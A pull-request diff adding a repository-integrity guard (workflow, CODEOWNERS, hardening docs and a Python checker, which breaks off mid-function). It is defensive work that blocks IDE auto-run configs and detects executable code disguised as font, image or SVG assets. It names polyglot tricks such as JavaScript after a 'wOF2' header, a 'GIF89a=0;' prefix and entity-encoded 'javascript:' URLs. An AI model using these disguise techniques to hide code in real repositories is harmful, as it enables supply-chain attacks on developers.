### PR TITLE
security: harden repository integrity and PR trust boundaries

### DIFF
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -1,0 +1,6 @@
+# Linthra security baseline
+#
+# Every change is owned by the project owner. When "Require review from Code
+# Owners" is enabled on the protected main ruleset, no contributor PR can merge
+# without an explicit owner review.
+* @TheZupZup

--- a/.github/workflows/repository-integrity.yml
+++ b/.github/workflows/repository-integrity.yml
@@ -1,0 +1,91 @@
+name: Repository integrity
+
+on:
+  pull_request:
+    types: [opened, synchronize, reopened, ready_for_review]
+
+permissions:
+  contents: read
+
+jobs:
+  self-test:
+    name: Repository integrity guard tests
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v7
+        with:
+          persist-credentials: false
+
+      - name: Set up Python
+        uses: actions/setup-python@v7
+        with:
+          python-version: "3.11"
+
+      - name: Run guard tests
+        run: python3 test/tooling/check_repository_integrity_test.py
+
+  integrity:
+    name: Repository integrity guard
+    runs-on: ubuntu-latest
+    if: ${{ !github.event.pull_request.draft }}
+    env:
+      BASE_SHA: ${{ github.event.pull_request.base.sha }}
+      HEAD_SHA: ${{ github.event.pull_request.head.sha }}
+      PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+      HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+      REPO_OWNER: ${{ github.repository_owner }}
+      CHECKER_PATH: scripts/check_repository_integrity.py
+
+    steps:
+      - name: Checkout PR head
+        uses: actions/checkout@v7
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+          fetch-depth: 0
+          persist-credentials: false
+
+      - name: Load trusted integrity checker
+        shell: bash
+        run: |
+          set -euo pipefail
+          checker="$RUNNER_TEMP/check_repository_integrity.py"
+
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            git fetch --no-tags --quiet origin "$BASE_SHA" 2>/dev/null || true
+          fi
+
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            echo "::error::Base commit $BASE_SHA is unavailable; refusing to evaluate repository integrity on incomplete history."
+            exit 1
+          fi
+
+          if git cat-file -e "$BASE_SHA:$CHECKER_PATH" 2>/dev/null; then
+            git show "$BASE_SHA:$CHECKER_PATH" > "$checker"
+            echo "Loaded repository-integrity checker from trusted PR base."
+          elif [ "$PR_AUTHOR" = "$REPO_OWNER" ] && [ "$HEAD_REPO" = "$GITHUB_REPOSITORY" ]; then
+            cp "$CHECKER_PATH" "$checker"
+            echo "Bootstrap: using repository-owner HEAD copy."
+          else
+            echo "::error::Trusted repository-integrity checker is missing from the PR base."
+            exit 1
+          fi
+
+      - name: Run repository integrity guard
+        shell: bash
+        run: |
+          set -euo pipefail
+          python3 "$RUNNER_TEMP/check_repository_integrity.py" \
+            --base "$BASE_SHA" \
+            --head "$HEAD_SHA" \
+            --pr-author "$PR_AUTHOR" \
+            --repo-owner "$REPO_OWNER" \
+            --report "$RUNNER_TEMP/repository-integrity.md"
+
+      - name: Publish repository integrity report
+        if: ${{ always() }}
+        shell: bash
+        run: |
+          if [ -f "$RUNNER_TEMP/repository-integrity.md" ]; then
+            cat "$RUNNER_TEMP/repository-integrity.md" >> "$GITHUB_STEP_SUMMARY"
+          fi

--- a/.github/workflows/repository-integrity.yml
+++ b/.github/workflows/repository-integrity.yml
@@ -1,0 +1,74 @@
+name: Repository integrity
+
+on:
+  pull_request:
+    types: [opened, synchronize, reopened, ready_for_review]
+
+permissions:
+  contents: read
+
+jobs:
+  integrity:
+    name: Repository integrity guard
+    runs-on: ubuntu-latest
+    if: ${{ !github.event.pull_request.draft }}
+    env:
+      BASE_SHA: ${{ github.event.pull_request.base.sha }}
+      HEAD_SHA: ${{ github.event.pull_request.head.sha }}
+      PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+      HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+      REPO_OWNER: ${{ github.repository_owner }}
+      CHECKER_PATH: scripts/check_repository_integrity.py
+
+    steps:
+      - name: Checkout PR head
+        uses: actions/checkout@v7
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+          fetch-depth: 0
+          persist-credentials: false
+
+      - name: Load trusted integrity checker
+        shell: bash
+        run: |
+          set -euo pipefail
+          checker="$RUNNER_TEMP/check_repository_integrity.py"
+
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            git fetch --no-tags --quiet origin "$BASE_SHA" 2>/dev/null || true
+          fi
+
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            echo "::error::Base commit $BASE_SHA is unavailable; refusing to evaluate repository integrity on incomplete history."
+            exit 1
+          fi
+
+          if git cat-file -e "$BASE_SHA:$CHECKER_PATH" 2>/dev/null; then
+            git show "$BASE_SHA:$CHECKER_PATH" > "$checker"
+            echo "Loaded repository-integrity checker from trusted PR base."
+          elif [ "$PR_AUTHOR" = "$REPO_OWNER" ] && [ "$HEAD_REPO" = "$GITHUB_REPOSITORY" ]; then
+            cp "$CHECKER_PATH" "$checker"
+            echo "Bootstrap: using repository-owner HEAD copy."
+          else
+            echo "::error::Trusted repository-integrity checker is missing from the PR base."
+            exit 1
+          fi
+
+      - name: Run repository integrity guard
+        shell: bash
+        run: |
+          set -euo pipefail
+          python3 "$RUNNER_TEMP/check_repository_integrity.py" \
+            --base "$BASE_SHA" \
+            --head "$HEAD_SHA" \
+            --pr-author "$PR_AUTHOR" \
+            --repo-owner "$REPO_OWNER" \
+            --report "$RUNNER_TEMP/repository-integrity.md"
+
+      - name: Publish repository integrity report
+        if: ${{ always() }}
+        shell: bash
+        run: |
+          if [ -f "$RUNNER_TEMP/repository-integrity.md" ]; then
+            cat "$RUNNER_TEMP/repository-integrity.md" >> "$GITHUB_STEP_SUMMARY"
+          fi

--- a/.github/workflows/repository-integrity.yml
+++ b/.github/workflows/repository-integrity.yml
@@ -8,6 +8,23 @@ permissions:
   contents: read
 
 jobs:
+  self-test:
+    name: Repository integrity guard tests
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v7
+        with:
+          persist-credentials: false
+
+      - name: Set up Python
+        uses: actions/setup-python@v7
+        with:
+          python-version: "3.11"
+
+      - name: Run guard tests
+        run: python3 test/tooling/check_repository_integrity_test.py
+
   integrity:
     name: Repository integrity guard
     runs-on: ubuntu-latest

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -1,0 +1,113 @@
+# Repository hardening
+
+Linthra uses two independent pull-request security gates:
+
+- **Security surface guard** classifies sensitive code and requires an explicit
+  owner review for risky trust-boundary changes.
+- **Repository integrity guard** fails closed on repository-control changes and
+  disguised executable assets.
+
+The repository-integrity layer was added after a real PR-history incident in
+which an unrelated commit carried IDE auto-run configuration and executable
+JavaScript disguised as a `.woff2` asset. The goal is prevention, not
+attribution: Git history can establish provenance and branch movement, but not
+a person's intent.
+
+## What the repository integrity guard blocks
+
+For external contributor PRs:
+
+- `.vscode/**`, `.idea/**`, and `*.code-workspace`
+- `.github/workflows/**`
+- repository automation under `scripts/`, `tool/`, and `tools/`
+- `CODEOWNERS`, `.gitattributes`, `.gitmodules`, and Dependabot policy
+- Git symlinks
+
+For every PR, including maintainer PRs:
+
+- removal of `.idea/` or `.vscode/` from the root `.gitignore`
+- files whose extension claims WOFF/WOFF2/TTF/OTF/PNG/JPEG/GIF/WEBP but whose
+  file signature does not match
+- active/executable SVG content such as `<script>`, event handlers,
+  `javascript:` URLs, `foreignObject`, or external executable references
+- text that invokes an asset such as `.woff2`, `.png`, or `.pdf` through
+  Node/Python/shell interpreters, or marks one executable with `chmod +x`
+
+Repository-control changes must be made from a trusted maintainer-controlled
+branch.
+
+## Required GitHub ruleset for `main`
+
+Create or update a branch ruleset targeting `main` and configure all of the
+following:
+
+1. **Require a pull request before merging**
+   - required approvals: **1**
+   - **Dismiss stale pull request approvals when new commits are pushed**
+   - **Require review from Code Owners**
+   - **Require approval of the most recent reviewable push**
+   - **Require conversation resolution before merging**
+2. **Block force pushes**
+3. **Restrict deletions**
+4. **Require status checks to pass before merging**
+   - `Flutter checks`
+   - `Secret & privacy scan`
+   - `Build Linux desktop`
+   - `Security surface guard`
+   - `Repository integrity guard`
+5. Do not give ordinary contributors a ruleset bypass.
+6. Prefer an empty bypass list; if an emergency bypass is retained, keep it to
+   the repository owner only.
+
+### Required-workflow pinning
+
+A status check matched only by name is not enough for a security workflow:
+a contributor can edit a workflow file in the same PR and attempt to preserve
+the job name while replacing its steps.
+
+Use a GitHub **required workflow / ruleset workflow requirement pinned to the
+trusted repository and default branch** for:
+
+- `.github/workflows/pr-security-review.yml`
+- `.github/workflows/repository-integrity.yml`
+
+This ensures the trusted workflow definition is what evaluates the PR.
+
+## Actions settings
+
+Under **Settings → Actions → General**:
+
+- keep the default `GITHUB_TOKEN` permission **read-only** unless an individual
+  workflow explicitly needs more
+- leave **Allow GitHub Actions to create and approve pull requests** disabled
+  unless a documented maintainer workflow needs it
+- require approval before workflows from untrusted fork contributors run, using
+  the strictest option that still fits the project workflow
+- never attach repository secrets to untrusted `pull_request` jobs
+
+## Contributor model
+
+External contributors should work from their own forks. Avoid granting `Write`
+access to the upstream repository merely to make contribution easier.
+
+For fork PRs:
+
+- keep branch ownership isolated in the contributor's fork
+- only use **Allow edits from maintainers** when a maintainer actually needs to
+  repair that contributor's branch
+- after any force-push, re-review the current HEAD; previous approval must not
+  carry forward
+
+## Incident response
+
+If a PR contains unexpected executable content:
+
+1. do not run the branch locally
+2. close or quarantine the PR
+3. record commit SHA, author/committer metadata, branch force-push events, and
+   the exact suspicious files
+4. compare the suspect commit with its parent to identify provenance
+5. rebuild useful feature work from a known-clean base instead of "cleaning"
+   the contaminated branch
+6. rotate secrets only if evidence shows they may have been exposed
+7. avoid attributing intent unless there is evidence beyond Git metadata

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -1,0 +1,180 @@
+# Repository hardening
+
+Linthra uses two independent pull-request security gates:
+
+- **Security surface guard** classifies sensitive code and requires an explicit
+  owner review for risky trust-boundary changes.
+- **Repository integrity guard** fails closed on repository-control changes and
+  disguised executable assets.
+
+The repository-integrity layer was added after a real PR-history incident in
+which an unrelated commit carried IDE auto-run configuration and executable
+JavaScript disguised as a `.woff2` asset. The goal is prevention, not
+attribution: Git history can establish provenance and branch movement, but not
+a person's intent.
+
+## What the repository integrity guard blocks
+
+For external contributor PRs:
+
+- `.vscode/**`, `.idea/**`, and `*.code-workspace`, matched case-insensitively
+  so case variants cannot collide on contributor filesystems
+- `.github/workflows/**` and composite actions under `.github/actions/**`, which
+  privileged workflows run from the PR head
+- repository automation under `scripts/`, `tool/`, and `tools/`
+- `CODEOWNERS`, `.gitattributes`, `.gitmodules`, and Dependabot policy
+- Git symlinks
+
+For every PR, including maintainer PRs:
+
+- removal of `.idea/` or `.vscode/` from the root `.gitignore`, including a
+  later `!` rule that re-enables one of them (Git applies the last matching
+  rule, so presence of the entry alone proves nothing)
+- files whose extension claims WOFF/WOFF2/TTF/OTF/PNG/JPEG/GIF/WEBP but whose
+  contents are not structurally that format. A magic prefix is not enough:
+  `wOF2` followed by JavaScript is four valid bytes, so each format is checked
+  against a self-describing field — a declared length that must equal the real
+  file size, or a redundant field derived from another
+- active/executable SVG content such as `<script>`, any `on*=` event handler,
+  `javascript:` URLs, `foreignObject`, or external executable references. The
+  scan runs over the raw source, the entity-decoded text, and a URL-normalised
+  form, since an XML parser resolves `java&#x73;cript:` and a URL parser then
+  discards embedded tabs and newlines
+- asset files committed with the executable bit set. The text scan only sees an
+  invocation someone wrote down; a payload committed already-executable needs
+  none
+- text that invokes an asset such as `.woff2`, `.png`, or `.pdf` through
+  Node/Python/shell interpreters (including `source` and dot commands), or
+  marks one executable with `chmod +x` or an executable numeric mode. Shell
+  backslash-newline continuations are resolved before this scan
+
+Repository-control changes must be made from a trusted maintainer-controlled
+branch.
+
+## Self-test fixtures
+
+The guard's own test module has to contain literal attack strings so it can
+assert that they are caught, which would otherwise make the repository-wide
+text scan flag the test file itself.
+
+The carve-out for this is deliberately small. A line inside
+`test/tooling/check_repository_integrity_test.py` is skipped by the
+asset-execution text scan — and by that check only — when it carries the
+marker `integrity-guard-fixture`. Every other line of that file, and every
+other check, still applies, and the same path is maintainer-controlled for
+external PRs so a fork cannot introduce a marked line. Fixture content written
+into a test repository carries no marker, so the attack strings the tests
+assert against remain detectable.
+
+Prefer this marker over path-wide exclusions: `test/` and `test/tooling/` stay
+fully scanned, because executable test infrastructure is itself a security
+surface.
+
+## Where the asset checks stop
+
+Container validation raises the cost of disguising an executable as an asset;
+it does not close the class. The honest boundary:
+
+- **Binary formats** (WOFF/WOFF2, TrueType/OpenType, PNG, JPEG, GIF, WEBP, ICO)
+  are validated structurally end to end — declared lengths must match, chunk and
+  block chains must land exactly on the end of the file, and an image must carry
+  a real bitstream signature. Polyglots against these are hard.
+- **PDF is different.** A shell reads a file line by line and continues past
+  errors, so only the opening lines decide what runs. No amount of trailing
+  xref, trailer or object structure prevents a payload on line two, and a
+  genuine PDF is itself "runnable" that way as a series of failing commands.
+  Parsing the object graph would buy nothing here, so the PDF check is a
+  deliberate sanity layer only.
+
+For WEBP the arithmetic happens to close the polyglot class outright. A file
+that is also JavaScript needs bytes 4-7 to open a comment (`/*` or `//`), and
+both begin `0x2F`, which little-endian makes the declared RIFF length odd. The
+chunk chain after the 12-byte header always consumes an even number of bytes,
+since every chunk is 8 + payload + pad-to-even. So the file size is even while
+`declared + 8` is odd, and no such file can pass. This is why later requests to
+validate the frame bitstream more deeply were declined: a minimal frame may be a
+corrupt image, but it cannot be an executable one.
+
+What actually defends a disguised asset is denying it an execution path:
+
+- assets may not carry the executable bit
+- no file in the repository may invoke one through an interpreter
+- IDE and container auto-run surfaces are maintainer-controlled
+
+Treat those three as the real control, and the format validators as depth.
+
+## Required GitHub ruleset for `main`
+
+Create or update a branch ruleset targeting `main` and configure all of the
+following:
+
+1. **Require a pull request before merging**
+   - required approvals: **1**
+   - **Dismiss stale pull request approvals when new commits are pushed**
+   - **Require review from Code Owners**
+   - **Require approval of the most recent reviewable push**
+   - **Require conversation resolution before merging**
+2. **Block force pushes**
+3. **Restrict deletions**
+4. **Require status checks to pass before merging**
+   - `Flutter checks`
+   - `Secret & privacy scan`
+   - `Build Linux desktop`
+   - `Security surface guard`
+   - `Repository integrity guard`
+5. Do not give ordinary contributors a ruleset bypass.
+6. Prefer an empty bypass list; if an emergency bypass is retained, keep it to
+   the repository owner only.
+
+### Required-workflow pinning
+
+A status check matched only by name is not enough for a security workflow:
+a contributor can edit a workflow file in the same PR and attempt to preserve
+the job name while replacing its steps.
+
+Use a GitHub **required workflow / ruleset workflow requirement pinned to the
+trusted repository and default branch** for:
+
+- `.github/workflows/pr-security-review.yml`
+- `.github/workflows/repository-integrity.yml`
+
+This ensures the trusted workflow definition is what evaluates the PR.
+
+## Actions settings
+
+Under **Settings → Actions → General**:
+
+- keep the default `GITHUB_TOKEN` permission **read-only** unless an individual
+  workflow explicitly needs more
+- leave **Allow GitHub Actions to create and approve pull requests** disabled
+  unless a documented maintainer workflow needs it
+- require approval before workflows from untrusted fork contributors run, using
+  the strictest option that still fits the project workflow
+- never attach repository secrets to untrusted `pull_request` jobs
+
+## Contributor model
+
+External contributors should work from their own forks. Avoid granting `Write`
+access to the upstream repository merely to make contribution easier.
+
+For fork PRs:
+
+- keep branch ownership isolated in the contributor's fork
+- only use **Allow edits from maintainers** when a maintainer actually needs to
+  repair that contributor's branch
+- after any force-push, re-review the current HEAD; previous approval must not
+  carry forward
+
+## Incident response
+
+If a PR contains unexpected executable content:
+
+1. do not run the branch locally
+2. close or quarantine the PR
+3. record commit SHA, author/committer metadata, branch force-push events, and
+   the exact suspicious files
+4. compare the suspect commit with its parent to identify provenance
+5. rebuild useful feature work from a known-clean base instead of "cleaning"
+   the contaminated branch
+6. rotate secrets only if evidence shows they may have been exposed
+7. avoid attributing intent unless there is evidence beyond Git metadata

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -35,7 +35,13 @@ For every PR, including maintainer PRs:
   against a self-describing field — a declared length that must equal the real
   file size, or a redundant field derived from another
 - active/executable SVG content such as `<script>`, any `on*=` event handler,
-  `javascript:` URLs, `foreignObject`, or external executable references
+  `javascript:` URLs, `foreignObject`, or external executable references. The
+  scan runs over the raw source, the entity-decoded text, and a URL-normalised
+  form, since an XML parser resolves `java&#x73;cript:` and a URL parser then
+  discards embedded tabs and newlines
+- asset files committed with the executable bit set. The text scan only sees an
+  invocation someone wrote down; a payload committed already-executable needs
+  none
 - text that invokes an asset such as `.woff2`, `.png`, or `.pdf` through
   Node/Python/shell interpreters, or marks one executable with `chmod +x`
 

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -36,6 +36,25 @@ For every PR, including maintainer PRs:
 Repository-control changes must be made from a trusted maintainer-controlled
 branch.
 
+## Self-test fixtures
+
+The guard's own test module has to contain literal attack strings so it can
+assert that they are caught, which would otherwise make the repository-wide
+text scan flag the test file itself.
+
+The carve-out for this is deliberately small. A line inside
+`test/tooling/check_repository_integrity_test.py` is skipped by the
+asset-execution text scan — and by that check only — when it carries the
+marker `integrity-guard-fixture`. Every other line of that file, and every
+other check, still applies, and the same path is maintainer-controlled for
+external PRs so a fork cannot introduce a marked line. Fixture content written
+into a test repository carries no marker, so the attack strings the tests
+assert against remain detectable.
+
+Prefer this marker over path-wide exclusions: `test/` and `test/tooling/` stay
+fully scanned, because executable test infrastructure is itself a security
+surface.
+
 ## Required GitHub ruleset for `main`
 
 Create or update a branch ruleset targeting `main` and configure all of the

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -18,7 +18,8 @@ a person's intent.
 For external contributor PRs:
 
 - `.vscode/**`, `.idea/**`, and `*.code-workspace`
-- `.github/workflows/**`
+- `.github/workflows/**` and composite actions under `.github/actions/**`, which
+  privileged workflows run from the PR head
 - repository automation under `scripts/`, `tool/`, and `tools/`
 - `CODEOWNERS`, `.gitattributes`, `.gitmodules`, and Dependabot policy
 - Git symlinks

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -83,6 +83,15 @@ it does not close the class. The honest boundary:
   Parsing the object graph would buy nothing here, so the PDF check is a
   deliberate sanity layer only.
 
+For WEBP the arithmetic happens to close the polyglot class outright. A file
+that is also JavaScript needs bytes 4-7 to open a comment (`/*` or `//`), and
+both begin `0x2F`, which little-endian makes the declared RIFF length odd. The
+chunk chain after the 12-byte header always consumes an even number of bytes,
+since every chunk is 8 + payload + pad-to-even. So the file size is even while
+`declared + 8` is odd, and no such file can pass. This is why later requests to
+validate the frame bitstream more deeply were declined: a minimal frame may be a
+corrupt image, but it cannot be an executable one.
+
 What actually defends a disguised asset is denying it an execution path:
 
 - assets may not carry the executable bit

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -67,6 +67,30 @@ Prefer this marker over path-wide exclusions: `test/` and `test/tooling/` stay
 fully scanned, because executable test infrastructure is itself a security
 surface.
 
+## Where the asset checks stop
+
+Container validation raises the cost of disguising an executable as an asset;
+it does not close the class. The honest boundary:
+
+- **Binary formats** (WOFF/WOFF2, TrueType/OpenType, PNG, JPEG, GIF, WEBP, ICO)
+  are validated structurally end to end — declared lengths must match, chunk and
+  block chains must land exactly on the end of the file, and an image must carry
+  a real bitstream signature. Polyglots against these are hard.
+- **PDF is different.** A shell reads a file line by line and continues past
+  errors, so only the opening lines decide what runs. No amount of trailing
+  xref, trailer or object structure prevents a payload on line two, and a
+  genuine PDF is itself "runnable" that way as a series of failing commands.
+  Parsing the object graph would buy nothing here, so the PDF check is a
+  deliberate sanity layer only.
+
+What actually defends a disguised asset is denying it an execution path:
+
+- assets may not carry the executable bit
+- no file in the repository may invoke one through an interpreter
+- IDE and container auto-run surfaces are maintainer-controlled
+
+Treat those three as the real control, and the format validators as depth.
+
 ## Required GitHub ruleset for `main`
 
 Create or update a branch ruleset targeting `main` and configure all of the

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -26,10 +26,15 @@ For external contributor PRs:
 
 For every PR, including maintainer PRs:
 
-- removal of `.idea/` or `.vscode/` from the root `.gitignore`
+- removal of `.idea/` or `.vscode/` from the root `.gitignore`, including a
+  later `!` rule that re-enables one of them (Git applies the last matching
+  rule, so presence of the entry alone proves nothing)
 - files whose extension claims WOFF/WOFF2/TTF/OTF/PNG/JPEG/GIF/WEBP but whose
-  file signature does not match
-- active/executable SVG content such as `<script>`, event handlers,
+  contents are not structurally that format. A magic prefix is not enough:
+  `wOF2` followed by JavaScript is four valid bytes, so each format is checked
+  against a self-describing field — a declared length that must equal the real
+  file size, or a redundant field derived from another
+- active/executable SVG content such as `<script>`, any `on*=` event handler,
   `javascript:` URLs, `foreignObject`, or external executable references
 - text that invokes an asset such as `.woff2`, `.png`, or `.pdf` through
   Node/Python/shell interpreters, or marks one executable with `chmod +x`

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -27,7 +27,14 @@ class Finding:
 
 PROTECTED_IGNORE_ENTRIES = (".idea/", ".vscode/")
 
-EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
+# Files that must be able to hold literal attack strings, because they are the
+# fixtures this guard is tested against. Only lines carrying the explicit marker
+# below are exempted, and only inside these exact paths.
+SELF_TEST_FIXTURE_PATHS = frozenset({"test/tooling/check_repository_integrity_test.py"})
+
+FIXTURE_EXEMPTION_MARKER = "integrity-guard-fixture"
+
+_EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"^\.vscode/"), "VS Code workspace configuration is maintainer-controlled"),
     (re.compile(r"^\.idea/"), "IDE project configuration is maintainer-controlled"),
     (re.compile(r"(?:^|/).*\.code-workspace$", re.I), "VS Code workspace file is maintainer-controlled"),
@@ -37,6 +44,16 @@ EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"^\.github/dependabot\.ya?ml$"), "dependency-update policy is maintainer-controlled"),
     (re.compile(r"^\.gitattributes$"), "Git diff/attribute policy is maintainer-controlled"),
     (re.compile(r"^\.gitmodules$"), "Git submodule policy is maintainer-controlled"),
+)
+
+# The self-test paths are maintainer-controlled by construction: an external PR
+# cannot add (or mark) a line that the fixture exemption would then skip.
+EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = _EXTERNAL_BLOCKED_PATHS + tuple(
+    (
+        re.compile(rf"^{re.escape(path)}$"),
+        "repository-integrity self-test fixtures are maintainer-controlled",
+    )
+    for path in sorted(SELF_TEST_FIXTURE_PATHS)
 )
 
 ASSET_MAGIC: dict[str, tuple[bytes, ...]] = {
@@ -245,17 +262,41 @@ def check_active_svg(head: str, files: list[str]) -> list[Finding]:
     return findings
 
 
+def is_exempt_fixture_line(path: str, line: str) -> bool:
+    """Report whether a single line opts out of the asset-execution text scan.
+
+    The exemption exists so the guard's own test module can hold the literal
+    attack strings it asserts against. It is deliberately narrow: it applies
+    only inside `SELF_TEST_FIXTURE_PATHS`, only to individual lines that carry
+    the marker, and only to this one check. Every other line of those files is
+    scanned normally, and external PRs cannot modify them at all.
+    """
+    return path in SELF_TEST_FIXTURE_PATHS and FIXTURE_EXEMPTION_MARKER in line
+
+
+def asset_execution_finding(path: str, text: str) -> Finding | None:
+    """Return a finding when `text` invokes or marks an asset as executable.
+
+    Scanning happens line by line on exactly the line separators the pattern
+    itself refuses to cross, so this sees what a whole-file search would.
+    """
+    for line in re.split(r"[\r\n]", text):
+        if is_exempt_fixture_line(path, line):
+            continue
+        if _EXECUTABLE_ASSET_RE.search(line):
+            return Finding(path, "text invokes or marks an asset file as executable")
+    return None
+
+
 def check_asset_execution(head: str, files: list[str]) -> list[Finding]:
     findings: list[Finding] = []
     for path in files:
         data = blob_bytes(head, path)
         if data is None or b"\x00" in data:
             continue
-        text = data.decode("utf-8", "surrogateescape")
-        if _EXECUTABLE_ASSET_RE.search(text):
-            findings.append(
-                Finding(path, "text invokes or marks an asset file as executable")
-            )
+        finding = asset_execution_finding(path, data.decode("utf-8", "surrogateescape"))
+        if finding is not None:
+            findings.append(finding)
     return findings
 
 

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -1,0 +1,744 @@
+#!/usr/bin/env python3
+"""Fail-closed repository-integrity checks for pull requests.
+
+This guard is intentionally narrower and stricter than the general PR security
+surface classifier. It protects repository trust policy, IDE auto-execution
+surfaces, and binary assets that can be disguised as executable text.
+
+The workflow that invokes this script must load it from the trusted PR base
+commit (or be pinned as a required workflow by a repository ruleset).
+"""
+
+from __future__ import annotations
+
+import argparse
+import fnmatch
+import html
+import re
+import subprocess
+import sys
+from collections.abc import Callable
+from dataclasses import dataclass
+from pathlib import Path
+
+
+@dataclass(frozen=True)
+class Finding:
+    path: str
+    reason: str
+
+
+PROTECTED_IGNORE_ENTRIES = (".idea/", ".vscode/")
+
+# Files that must be able to hold literal attack strings, because they are the
+# fixtures this guard is tested against. Only lines carrying the explicit marker
+# below are exempted, and only inside these exact paths.
+SELF_TEST_FIXTURE_PATHS = frozenset({"test/tooling/check_repository_integrity_test.py"})
+
+FIXTURE_EXEMPTION_MARKER = "integrity-guard-fixture"
+
+_EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"^\.vscode/", re.I), "VS Code workspace configuration is maintainer-controlled"),
+    (re.compile(r"^\.idea/", re.I), "IDE project configuration is maintainer-controlled"),
+    (re.compile(r"(?:^|/).*\.code-workspace$", re.I), "VS Code workspace file is maintainer-controlled"),
+    (re.compile(r"^\.github/workflows/"), "GitHub Actions workflows are maintainer-controlled"),
+    (re.compile(r"^\.github/actions/"), "GitHub composite actions are maintainer-controlled"),
+    (re.compile(r"^(?:scripts|tool|tools)/"), "repository automation scripts are maintainer-controlled"),
+    (re.compile(r"(?:^|/)CODEOWNERS$"), "code-ownership policy is maintainer-controlled"),
+    (re.compile(r"^\.github/dependabot\.ya?ml$"), "dependency-update policy is maintainer-controlled"),
+    (re.compile(r"^\.gitattributes$"), "Git diff/attribute policy is maintainer-controlled"),
+    (re.compile(r"^\.gitmodules$"), "Git submodule policy is maintainer-controlled"),
+)
+
+# The self-test paths are maintainer-controlled by construction: an external PR
+# cannot add (or mark) a line that the fixture exemption would then skip.
+EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = _EXTERNAL_BLOCKED_PATHS + tuple(
+    (
+        re.compile(rf"^{re.escape(path)}$"),
+        "repository-integrity self-test fixtures are maintainer-controlled",
+    )
+    for path in sorted(SELF_TEST_FIXTURE_PATHS)
+)
+
+def _u16(data: bytes, offset: int) -> int:
+    return int.from_bytes(data[offset : offset + 2], "big")
+
+
+def _u32(data: bytes, offset: int) -> int:
+    return int.from_bytes(data[offset : offset + 4], "big")
+
+
+# A magic prefix alone is worthless here: `wOF2` followed by JavaScript is still
+# four valid bytes. Each validator below checks a self-describing structural
+# field — a declared length that must equal the real file size, or a redundant
+# field derived from another — so appended or substituted script breaks it.
+
+
+def _valid_woff(data: bytes, signature: bytes, header_size: int) -> bool:
+    """WOFF/WOFF2 declare their own total length and a zeroed reserved field."""
+    if len(data) < header_size or not data.startswith(signature):
+        return False
+    if _u32(data, 8) != len(data):
+        return False
+    return _u16(data, 12) != 0 and _u16(data, 14) == 0
+
+
+def _valid_sfnt(data: bytes) -> bool:
+    """TrueType/OpenType: searchRange and friends are derived from numTables."""
+    if len(data) < 12 or data[:4] not in (b"\x00\x01\x00\x00", b"true", b"typ1", b"OTTO"):
+        return False
+    num_tables = _u16(data, 4)
+    if num_tables == 0 or len(data) < 12 + 16 * num_tables:
+        return False
+    entry_selector = num_tables.bit_length() - 1
+    search_range = (1 << entry_selector) * 16
+    return (
+        _u16(data, 6) == search_range
+        and _u16(data, 8) == entry_selector
+        and _u16(data, 10) == num_tables * 16 - search_range
+    )
+
+
+def _valid_png(data: bytes) -> bool:
+    """The 8-byte signature must be followed by a well-formed 13-byte IHDR."""
+    if len(data) < 33 or not data.startswith(b"\x89PNG\r\n\x1a\n"):
+        return False
+    return _u32(data, 8) == 13 and data[12:16] == b"IHDR"
+
+
+_JPEG_MARKERS = frozenset(range(0xC0, 0xFF)) - {0xD8, 0xD9}
+
+
+def _valid_jpeg(data: bytes) -> bool:
+    if len(data) < 4 or not data.startswith(b"\xff\xd8\xff"):
+        return False
+    return data[3] in _JPEG_MARKERS and b"\xff\xd9" in data
+
+
+def _skip_gif_sub_blocks(data: bytes, pos: int) -> int:
+    """Walk a chain of length-prefixed sub-blocks; -1 if it runs off the end."""
+    while pos < len(data):
+        size = data[pos]
+        pos += 1
+        if size == 0:
+            return pos
+        pos += size
+    return -1
+
+
+def _valid_gif(data: bytes) -> bool:
+    """Walk the whole block structure through to the trailer.
+
+    A header check is not enough: `GIF89a=0;` parses as a header with non-zero
+    canvas dimensions *and* as JavaScript. Requiring the block chain to resolve
+    exactly onto the trailer leaves no room for a trailing script.
+    """
+    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
+        return False
+    if int.from_bytes(data[6:8], "little") == 0 or int.from_bytes(data[8:10], "little") == 0:
+        return False
+
+    flags = data[10]
+    pos = 13
+    if flags & 0x80:
+        pos += 3 * (1 << ((flags & 0x07) + 1))
+
+    while 0 <= pos < len(data):
+        block = data[pos]
+        pos += 1
+        if block == 0x3B:
+            return pos == len(data)
+        if block == 0x21:
+            if pos >= len(data):
+                return False
+            pos = _skip_gif_sub_blocks(data, pos + 1)
+        elif block == 0x2C:
